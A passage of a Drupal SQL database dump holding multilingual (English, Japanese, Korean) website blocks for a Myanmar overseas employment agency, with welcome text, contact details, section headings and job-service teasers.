('basic', 0, 1, 1, 'ja', 0, '<p><img src=\"/sites/default/files/inline-images/new_comet_trading_agency.jpg\" data-align=\"left\" data-entity-uuid=\"2db86a59-6abc-480d-8723-840a63e08233\" data-entity-type=\"file\"></p><h3>弊社ウェブサイト「NEW COMET TRADING AGENCY」へようこそ！</h3><p>当社のウェブサイト、「NEW COMET TRADING AGENCY」へようこそ！ご訪問いただき、大変嬉しく思っています。当ウェブサイトをお楽しみいただき、提供しているサービスや機会についてさらに詳しくご覧ください。何か質問やお手伝いがございましたら、お気軽にお問い合わせください。私たちは皆様の目標達成の旅をサポートするためにここにいます。</p><p>海外人材紹介会社では現在、韓国、日本、マレーシアなどの様々な求人をご紹介しております。&nbsp;</p><p>是非ご参加！！！</p><div><a href=\"/node/1\">もっと読むにはこちら<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 1, 1, 'ko', 0, '<p><img src=\"/sites/default/files/inline-images/new_comet_trading_agency.jpg\" data-align=\"left\" data-entity-uuid=\"2db86a59-6abc-480d-8723-840a63e08233\" data-entity-type=\"file\"></p><div class=\"flex flex-grow flex-col gap-3\"><div class=\"min-h-[20px] flex items-start overflow-x-auto whitespace-pre-wrap break-words flex-col gap-4\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><h3>\"NEW COMET TRADING AGENCY\" 웹사이트에 오신 것을 환영합니다!!!!&nbsp;</h3><p>\"NEW COMET TRADING AGENCY\" 웹사이트 방문에 감사드립니다! 저희가 여러분을 여기에 맞이할 수 있어 기쁩니다. 자유롭게 웹사이트를 탐색하시고 제공하는 서비스와 기회에 대해 더 자세히 알아보세요. 질문이나 도움이 필요하신 경우 언제든지 저희에게 연락해주십시오. 여러분의 목표 달성을 위한 여정에서 도움을 드리기 위해 준비되어 있습니다.</p><p>저희 해외 취업 대행사는 현재 한국, 일본, 말레이시아 등에서 다양한 채용 정보를 소개하고 있습니다.</p><p>함께 참여해 보세요 !!!</p></div></div></div><div><a href=\"/node/1\">더읽기<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 2, 2, 'en', 0, '<p><a class=\"keep\" href=\"/announcement\">More announcement<img src=\"/sites/default/files/inline-images/arrow_icon_2.png\" data-entity-uuid=\"109b8a8f-a099-4327-990d-f54fec10fdf3\" data-entity-type=\"file\" float=\"right\"></a></p>', '', 'full_html'),
('basic', 0, 2, 2, 'ja', 0, '<p><a class=\"keep\" href=\"/announcement\">さらにお知らせ<img src=\"/sites/default/files/inline-images/arrow_icon_2.png\" data-entity-uuid=\"109b8a8f-a099-4327-990d-f54fec10fdf3\" data-entity-type=\"file\" float=\"right\"></a></p>', '', 'full_html'),
('basic', 0, 2, 2, 'ko', 0, '<p><a class=\"keep\" href=\"/announcement\">추가공지<img src=\"/sites/default/files/inline-images/arrow_icon_2.png\" data-entity-uuid=\"109b8a8f-a099-4327-990d-f54fec10fdf3\" data-entity-type=\"file\" float=\"right\"></a></p>', '', 'full_html'),
('basic', 0, 3, 3, 'en', 0, '<p><a class=\"keep\" href=\"/activities\">More activity<img src=\"/sites/default/files/inline-images/arrow_icon_1.png\" data-entity-uuid=\"3cbef209-85d4-4dca-8253-4b5f9cd30235\" data-entity-type=\"file\" float=\"right\"></a></p>', '', 'full_html'),
('basic', 0, 3, 3, 'ja', 0, '<p><a class=\"keep\" href=\"/activities\">さらなる活動<img src=\"/sites/default/files/inline-images/arrow_icon_1.png\" data-entity-uuid=\"3cbef209-85d4-4dca-8253-4b5f9cd30235\" data-entity-type=\"file\" float=\"right\"></a></p>', '', 'full_html'),
('basic', 0, 3, 3, 'ko', 0, '<p><a class=\"keep\" href=\"/activities\">추가활<img src=\"/sites/default/files/inline-images/arrow_icon_1.png\" data-entity-uuid=\"3cbef209-85d4-4dca-8253-4b5f9cd30235\" data-entity-type=\"file\" float=\"right\"></a></p>', '', 'full_html'),
('basic', 0, 4, 4, 'en', 0, '<p>Building(A-3-2)2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;&nbsp;</p><p>Phone: 01 8393300, 01 8393344, 01 8393393, 09775556677 &nbsp;|&nbsp;</p><p>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a> |&nbsp;</p><p>Website: www.newcomettradingagency.com</p>', '', 'full_html'),
('basic', 0, 4, 4, 'ja', 0, '<p>Building(A-3-2)2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;&nbsp;</p><p>Phone: 01 8393300, 01 8393344, 01 8393393, 09775556677 |&nbsp;</p><p>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a> &nbsp;|&nbsp;</p><p>Website: www.newcomettradingagency.com</p>', '', 'full_html'),
('basic', 0, 4, 4, 'ko', 0, '<p>Building(A-3-2)2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;&nbsp;</p><p>Phone: 01 8393300, 01 8393344, 01 8393393, 09775556677 |&nbsp;</p><p>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a> |&nbsp;</p><p>Website: www.newcomettradingagency.com</p>', '', 'full_html'),
('basic', 0, 5, 5, 'en', 0, '<p>Follow Up On Our Facebook <a href=\"https://www.facebook.com/profile.php?id=100092647360208\" target=\"_blank\"><img src=\"/sites/default/files/inline-images/icon_fb.png\" data-align=\"left\" data-entity-uuid=\"ba1d9141-49be-49d2-93b6-f9881ad95655\" data-entity-type=\"file\"></a></p>', '', 'full_html'),
('basic', 0, 5, 5, 'ja', 0, '<p>Follow Up On Our Facebook <a href=\"https://www.facebook.com/profile.php?id=100092647360208\" target=\"_blank\"><img src=\"/sites/default/files/inline-images/icon_fb.png\" data-align=\"left\" data-entity-uuid=\"ba1d9141-49be-49d2-93b6-f9881ad95655\" data-entity-type=\"file\"></a></p>', '', 'full_html'),
('basic', 0, 5, 5, 'ko', 0, '<p>Follow Up On Our Facebook <a href=\"https://www.facebook.com/profile.php?id=100092647360208\" target=\"_blank\"><img src=\"/sites/default/files/inline-images/icon_fb.png\" data-align=\"left\" data-entity-uuid=\"ba1d9141-49be-49d2-93b6-f9881ad95655\" data-entity-type=\"file\"></a></p>', '', 'full_html'),
('basic', 0, 6, 6, 'en', 0, '<p>Copyright 2023, New Comet Trading Agency Co., Ltd.</p>', '', 'full_html'),
('basic', 0, 7, 7, 'en', 0, '<h2 class=\"text-align-center\">Announcement</h2>', '', 'full_html'),
('basic', 0, 7, 7, 'ja', 0, '<h2 class=\"text-align-center\">お知らせ</h2>', '', 'full_html'),
('basic', 0, 7, 7, 'ko', 0, '<h2 class=\"text-align-center\">공지</h2>', '', 'full_html'),
('basic', 0, 8, 8, 'en', 0, '<h2 class=\"text-align-center\">About Us</h2>', '', 'full_html'),
('basic', 0, 8, 8, 'ja', 0, '<h2 class=\"text-align-center\">会社概要</h2>', '', 'full_html'),
('basic', 0, 8, 8, 'ko', 0, '<h2 class=\"text-align-center\">소개</h2>', '', 'full_html'),
('basic', 0, 9, 9, 'en', 0, '<h2 class=\"text-align-center\">Contact Us</h2>', '', 'full_html'),
('basic', 0, 9, 9, 'ja', 0, '<h2 class=\"text-align-center\">お問い合わせ</h2>', '', 'full_html'),
('basic', 0, 9, 9, 'ko', 0, '<h2 class=\"text-align-center\">연락처</h2>', '', 'full_html'),
('basic', 0, 10, 10, 'en', 0, '<h2 class=\"text-align-center\">Activities</h2>', '', 'full_html'),
('basic', 0, 10, 10, 'ja', 0, '<h2 class=\"text-align-center\">活動</h2>', '', 'full_html'),
('basic', 0, 10, 10, 'ko', 0, '<h2 class=\"text-align-center\">활동</h2>', '', 'full_html'),
('basic', 0, 11, 11, 'en', 0, '<h2 class=\"text-align-center\">Company Profile</h2>', '', 'full_html'),
('basic', 0, 11, 11, 'ja', 0, '<h2 class=\"text-align-center\">会社情報</h2>', '', 'full_html'),
('basic', 0, 11, 11, 'ko', 0, '<h2 class=\"text-align-center\">회사 설립</h2>', '', 'full_html'),
('basic', 0, 12, 12, 'en', 0, '<h2 class=\"text-align-center\">Our Services</h2>', '', 'full_html'),
('basic', 0, 12, 12, 'ja', 0, '<h2 class=\"text-align-center\">事業内容</h2>', '', 'full_html'),
('basic', 0, 12, 12, 'ko', 0, '<h2 class=\"text-align-center\">회사 서비스</h2>', '', 'full_html'),
('basic', 0, 13, 13, 'en', 0, '<h2 class=\"text-align-center\">Mission &amp; Vision</h2>', '', 'full_html'),
('basic', 0, 13, 13, 'ja', 0, '<h2 class=\"text-align-center\">目標 &amp;ミッション</h2>', '', 'full_html'),
('basic', 0, 13, 13, 'ko', 0, '<h2 class=\"text-align-center\">우리의 비젼 &amp; 우리의 미션</h2>', '', 'full_html'),
('basic', 0, 14, 14, 'en', 0, '<h2 class=\"text-align-center\">Future Goal</h2>', '', 'full_html'),
('basic', 0, 14, 14, 'ja', 0, '<h2 class=\"text-align-center\">会社の目標</h2>', '', 'full_html'),
('basic', 0, 14, 14, 'ko', 0, '<h2 class=\"text-align-center\">회사의 미래 비전</h2>', '', 'full_html'),
('basic', 0, 15, 15, 'en', 0, '<h2 class=\"text-align-center\">Company History</h2>', '', 'full_html'),
('basic', 0, 15, 15, 'ja', 0, '<h2 class=\"text-align-center\">会社沿革</h2>', '', 'full_html'),
('basic', 0, 15, 15, 'ko', 0, '<h2 class=\"text-align-center\">Company History</h2>', '', 'full_html'),
('basic', 0, 16, 16, 'en', 0, '<img src=\"/sites/default/files/inline-images/company_profile.png\" data-align=\"center\" data-entity-uuid=\"4a7f3b73-a856-4ca8-a3f9-f757d636fa88\" data-entity-type=\"file\"><p class=\"text-align-justify\">In addition, we are connecting job opportunities for young people who want to work in countries ...</p><div><a class=\"keep\" href=\"/node/23\">Readmore<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 16, 16, 'ja', 0, '<img src=\"/sites/default/files/inline-images/company_profile.png\" data-align=\"center\" data-entity-uuid=\"4a7f3b73-a856-4ca8-a3f9-f757d636fa88\" data-entity-type=\"file\"><p class=\"text-align-justify\"><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);box-sizing:border-box;color:rgb(51, 51, 51);font-family:Lato-Regular, pyidaungsu;font-size:17px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\" lang=\"JA\" xml:lang=\"JA\">当社は</span><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);box-sizing:border-box;color:rgb(51, 51, 51);font-family:Lato-Regular, pyidaungsu;font-size:17px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">2004</span><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);box-sizing:border-box;color:rgb(51, 51, 51);font-family:Lato-Regular, pyidaungsu;font-size:17px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\" lang=\"JA\" xml:lang=\"JA\">年に設立し、登録</span><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);box-sizing:border-box;color:rgb(51, 51, 51);font-family:Lato-Regular, pyidaungsu;font-size:17px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">ID(295/2004</span><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);box-sizing:border-box;color:rgb(51, 51, 51);font-family:Lato-Regular, pyidaungsu;font-size:17px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\" lang=\"JA\" xml:lang=\"JA\">ー</span><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);box-sizing:border-box;color:rgb(51, 51, 51);font-family:Lato-Regular, pyidaungsu;font-size:17px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">2005)</span><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);box-sizing:border-box;color:rgb(51, 51, 51);font-family:Lato-Regular, pyidaungsu;font-size:17px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\" lang=\"JA\" xml:lang=\"JA\">を持ち、サービスの提供を行ってきました.....</span></p><div><a class=\"keep\" href=\"/ja/node/23\">もっと読むにはこちら<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 16, 16, 'ko', 0, '<img src=\"/sites/default/files/inline-images/company_profile.png\" data-align=\"center\" data-entity-uuid=\"4a7f3b73-a856-4ca8-a3f9-f757d636fa88\" data-entity-type=\"file\"><p>저희 ``New Comet Trading\'\' 회사는 2004년에 설립되어 사업자등록번호(295/2004-2005)로 영업을...</p><div><a class=\"keep\" href=\"/ko/node/23\">더읽기<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 17, 17, 'en', 0, '<img src=\"/sites/default/files/inline-images/our_services.png\" data-align=\"center\" data-entity-uuid=\"032ff33b-e5ee-4678-b9cf-394553a3c5ea\" data-entity-type=\"file\"><p class=\"text-align-justify\">Co-opening and teaching Korean, Japanese, and English basic language courses for work so that....</p><div><a class=\"keep\" href=\"/node/24\">Readmore<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 17, 17, 'ja', 0, '<img src=\"/sites/default/files/inline-images/our_services.png\" data-align=\"center\" data-entity-uuid=\"032ff33b-e5ee-4678-b9cf-394553a3c5ea\" data-entity-type=\"file\"><p class=\"text-align-justify\"><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);box-sizing:border-box;color:rgb(51, 51, 51);font-family:Lato-Regular, pyidaungsu;font-size:17px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\" lang=\"JA\" xml:lang=\"JA\">ニューコメットトレンディグエイジェンシーでは韓国の造船所で</span><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(51, 51, 51);display:inline !important;float:none;font-family:Lato-Regular, pyidaungsu;font-size:17px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">E 7-3 Visa</span><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);box-sizing:border-box;color:rgb(51, 51, 51);font-family:Lato-Regular, pyidaungsu;font-size:17px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\" lang=\"JA\" xml:lang=\"JA\">で働きたいミャ ....</span></p><div><a class=\"keep\" href=\"/ja/node/24\">もっと読むにはこちら<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 17, 17, 'ko', 0, '<img src=\"/sites/default/files/inline-images/our_services.png\" data-align=\"center\" data-entity-uuid=\"032ff33b-e5ee-4678-b9cf-394553a3c5ea\" data-entity-type=\"file\"><p class=\"text-align-justify\">한국 조선소에서 E-7-3 비자(용접공)로 일하고 싶은 미얀마 여러 지역에서 온 모든 노동자들을 인종과 ...</p><div><a class=\"keep\" href=\"/ko/node/24\">더읽기<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 18, 18, 'en', 0, '<img src=\"/sites/default/files/inline-images/vission_mission.png\" data-align=\"center\" data-entity-uuid=\"50f34ff2-1c49-4904-8376-7355f0f27182\" data-entity-type=\"file\"><p>The aim is to train the best local human resources and develop overseas employment...</p><div><a class=\"keep\" href=\"/node/25\">Readmore<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 18, 18, 'ja', 0, '<img src=\"/sites/default/files/inline-images/vission_mission.png\" data-align=\"center\" data-entity-uuid=\"50f34ff2-1c49-4904-8376-7355f0f27182\" data-entity-type=\"file\"><p><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(51, 51, 51);display:inline !important;float:none;font-family:&quot;Malgun Gothic&quot;, sans-serif;font-size:16px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">能力の高い生徒達を生み出し、国際スタンダードに負けない会社を運営して参ります....</span></p><div><a class=\"keep\" href=\"/ja/node/25\">もっと読むにはこちら<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 18, 18, 'ko', 0, '<img src=\"/sites/default/files/inline-images/vission_mission.png\" data-align=\"center\" data-entity-uuid=\"50f34ff2-1c49-4904-8376-7355f0f27182\" data-entity-type=\"file\"><p>대행사와 고객 간의 상호, 존중, 정직, 신뢰로 오래 지속되는 관계를 구축하기 .다른 대행사에 비하면 ...</p><div><a class=\"keep\" href=\"/ko/node/25\">더읽기<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 19, 19, 'en', 0, '<img src=\"/sites/default/files/inline-images/future_goal.png\" data-align=\"center\" data-entity-uuid=\"6d40ca24-1206-4343-ae98-bd346e011253\" data-entity-type=\"file\"><p>Our company is established with the aim of creating a company that meets the international...</p><div><a class=\"keep\" href=\"/node/26\">Readmore<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 19, 19, 'ja', 0, '<img src=\"/sites/default/files/inline-images/future_goal.png\" data-align=\"center\" data-entity-uuid=\"6d40ca24-1206-4343-ae98-bd346e011253\" data-entity-type=\"file\"><p><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(51, 51, 51);display:inline !important;float:none;font-family:&quot;Malgun Gothic&quot;, sans-serif;font-size:17px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">我々はミャンマーの現状を見抜き、海外で働きたい生徒達の訓練、能力の高い生徒達を生み出し...</span></p><div><a class=\"keep\" href=\"/ja/node/26\">もっと読むにはこちら<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 19, 19, 'ko', 0, '<img src=\"/sites/default/files/inline-images/future_goal.png\" data-align=\"center\" data-entity-uuid=\"6d40ca24-1206-4343-ae98-bd346e011253\" data-entity-type=\"file\"><p>우리 회사는 위대한 미얀마의 현재 상황과 필요에 따라 외국에서 일하고 싶은 미래의 청년들에게 훈련과...</p><div><a class=\"keep\" href=\"/ko/node/26\">더읽기<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 20, 20, 'en', 0, '<img src=\"/sites/default/files/inline-images/company_history.png\" data-align=\"center\" data-entity-uuid=\"77c60154-a377-47fb-8ad6-beea4578f984\" data-entity-type=\"file\"><p>Some of the construction works completed by us in the financial year (2013-2014) and (2014-2015) by ...&nbsp;</p><div><a class=\"keep\" href=\"/node/27\">Readmore<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 20, 20, 'ja', 0, '<img src=\"/sites/default/files/inline-images/company_history.png\" data-align=\"center\" data-entity-uuid=\"77c60154-a377-47fb-8ad6-beea4578f984\" data-entity-type=\"file\"><p>当社の「ニュー コメット コンストラクション株式会社」は2004年に会社登録番号(295/2004-2005)で ...&nbsp;</p><div><a class=\"keep\" href=\"/ja/node/27\">もっと読むにはこちら<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 20, 20, 'ko', 0, '<img src=\"/sites/default/files/inline-images/company_history.png\" data-align=\"center\" data-entity-uuid=\"77c60154-a377-47fb-8ad6-beea4578f984\" data-entity-type=\"file\"><p>Some of the construction works completed by us in the financial year (2013-2014) and (2014-2015) ...&nbsp;</p><div><a class=\"keep\" href=\"/ko/node/27\">더읽기<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 21, 21, 'en', 0, '<img src=\"/sites/default/files/inline-images/contact_us.png\" data-align=\"center\" data-entity-uuid=\"5deff5f7-b997-4b87-a646-facd09b48ba7\" data-entity-type=\"file\"><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan...</p><div><a class=\"keep\" href=\"/node/11\">Readmore<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 21, 21, 'ja', 0, '<img src=\"/sites/default/files/inline-images/contact_us.png\" data-align=\"center\" data-entity-uuid=\"5deff5f7-b997-4b87-a646-facd09b48ba7\" data-entity-type=\"file\"><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaung...</p><div><a class=\"keep\" href=\"/ja/node/11\">もっと読むにはこちら<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 21, 21, 'ko', 0, '<img src=\"/sites/default/files/inline-images/contact_us.png\" data-align=\"center\" data-entity-uuid=\"5deff5f7-b997-4b87-a646-facd09b48ba7\" data-entity-type=\"file\"><p>A 3-2동, 2층, 201호, 미얀마 공리 주택(Myanmagonyi Housing)...</p><div><a class=\"keep\" href=\"/ko/node/11\">더읽기<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 22, 22, 'ja', 0, '<p><a class=\"keep\" href=\"/language-center\">More Language Center<img src=\"/sites/default/files/inline-images/arrow_icon_2.png\" data-entity-uuid=\"109b8a8f-a099-4327-990d-f54fec10fdf3\" data-entity-type=\"file\" float=\"right\"></a></p>', '', 'full_html'),
('basic', 0, 23, 23, 'en', 0, '<h2>Activities</h2>', '', 'basic_html'),
('basic', 0, 24, 24, 'en', 0, '<h2 class=\"text-align-center\">Language Center</h2>', '', 'full_html'),
('basic', 0, 24, 24, 'ja', 0, '<h2 class=\"text-align-center\">語学センター</h2>', '', 'full_html'),
('basic', 0, 24, 24, 'ko', 0, '<h2 class=\"text-align-center\">언어 센터</h2>', '', 'full_html');

-- --------------------------------------------------------

--
-- Table structure for table `block_content__body`
--

CREATE TABLE `block_content__body` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `body_value` longtext NOT NULL,
  `body_summary` longtext,
  `body_format` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Data storage for block_content field body.';

--
-- Dumping data for table `block_content__body`
--

INSERT INTO `block_content__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('basic', 0, 1, 1, 'en', 0, '<p><img src=\"/sites/default/files/inline-images/new_comet_trading_agency.jpg\" data-align=\"left\" data-entity-uuid=\"2db86a59-6abc-480d-8723-840a63e08233\" data-entity-type=\"file\"></p><h3>Welcome to Our Website \"NEW COMET TRADING AGENCY\"!!!!</h3><p>Thank you for visiting our website, \"NEW COMET TRADING AGENCY\"! We are delighted to have you here. Please feel free to explore our website and learn more about the services and opportunities we offer. If you have any questions or need assistance, don\'t hesitate to reach out to us. We are here to help you on your journey towards achieving your goals.</p><p>We, Overseas Employment Agency are currently introducing various job offers from Korea, Japan, Malaysia etc..&nbsp;</p><p>Come &amp; Join Us !!!&nbsp;</p><div><a href=\"/node/1\">Readmore<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 1, 1, 'ja', 0, '<p><img src=\"/sites/default/files/inline-images/new_comet_trading_agency.jpg\" data-align=\"left\" data-entity-uuid=\"2db86a59-6abc-480d-8723-840a63e08233\" data-entity-type=\"file\"></p><h3>弊社ウェブサイト「NEW COMET TRADING AGENCY」へようこそ！</h3><p>当社のウェブサイト、「NEW COMET TRADING AGENCY」へようこそ！ご訪問いただき、大変嬉しく思っています。当ウェブサイトをお楽しみいただき、提供しているサービスや機会についてさらに詳しくご覧ください。何か質問やお手伝いがございましたら、お気軽にお問い合わせください。私たちは皆様の目標達成の旅をサポートするためにここにいます。</p><p>海外人材紹介会社では現在、韓国、日本、マレーシアなどの様々な求人をご紹介しております。&nbsp;</p><p>是非ご参加！！！</p><div><a href=\"/node/1\">もっと読むにはこちら<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
